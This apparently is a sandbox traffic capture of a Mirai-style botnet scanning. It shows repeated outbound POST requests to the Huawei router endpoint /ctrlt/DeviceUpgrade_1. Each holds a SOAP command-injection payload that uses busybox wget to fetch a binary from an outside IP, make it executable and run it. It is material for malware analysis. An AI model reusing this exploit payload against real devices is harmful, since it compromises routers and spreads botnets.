                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1778192.168.2.1344790197.237.142.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537976980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1779192.168.2.1335740157.168.202.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538026094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1780192.168.2.134931041.44.135.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538043976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1781192.168.2.1338866197.201.2.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538049936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1782192.168.2.1359788197.84.56.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538053036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1783192.168.2.1333016197.230.227.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538053989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1784192.168.2.133884034.159.175.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538060904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1785192.168.2.1345262197.8.109.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538091898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1786192.168.2.1354390197.3.124.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538091898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1787192.168.2.1339500157.60.183.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.538149118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 